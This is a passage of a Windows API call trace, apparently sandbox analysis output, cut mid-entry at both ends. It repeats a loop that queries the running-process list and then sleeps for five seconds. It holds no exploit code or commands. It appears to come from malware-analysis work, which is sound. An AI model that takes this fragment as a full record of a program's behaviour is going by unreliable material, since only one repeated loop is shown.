RegionSize=0x19ea68*=0x10000) returned 0x0 [0207.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0207.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0207.906] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0207.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0207.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0208.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0208.009] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0208.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0208.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0208.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0208.097] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0208.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0208.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0208.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0208.205] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0208.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0208.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0208.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0208.317] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0208.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0208.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0208.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0208.426] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0208.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0208.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0208.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0208.547] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0208.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0208.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0208.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0208.644] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0208.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0208.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0208.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0208.764] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0208.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0208.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0208.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0208.876] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0208.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0208.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0208.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0208.969] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0208.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0208.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0209.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0209.074] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0209.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0209.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0209.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0209.162] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0209.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0209.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0209.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0209.278] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0209.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0209.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0209.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0209.405] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0209.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0209.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0209.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0209.544] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0209.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0209.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0209.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0209.668] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0209.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0209.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0209.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0209.882] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0209.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0209.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0210.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0210.006] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0210.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0210.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0210.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0210.098] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0210.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0210.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0210.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0210.189] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0210.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0210.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0210.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0210.303] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0210.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0210.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0210.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0210.407] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0210.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0210.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0210.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0210.538] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0210.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0210.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0210.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0210.681] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0210.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0210.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0210.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0210.829] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0210.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0210.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0210.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0210.955] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0210.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0210.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0211.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0211.065] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0211.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0211.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0211.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0211.175] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0211.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0211.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0211.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0211.279] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0211.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0211.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0211.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0211.396] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0211.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0211.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0211.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0211.495] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0211.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0211.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0211.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0211.612] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0211.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0211.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0211.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0211.835] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0211.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0211.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0212.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0212.049] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0212.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0212.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0212.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0212.273] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0212.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0212.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0212.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0212.515] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0212.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0212.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0212.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0212.796] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0212.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0212.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0213.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0213.060] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0213.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0213.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0213.290] NtFreeVirtualMemory 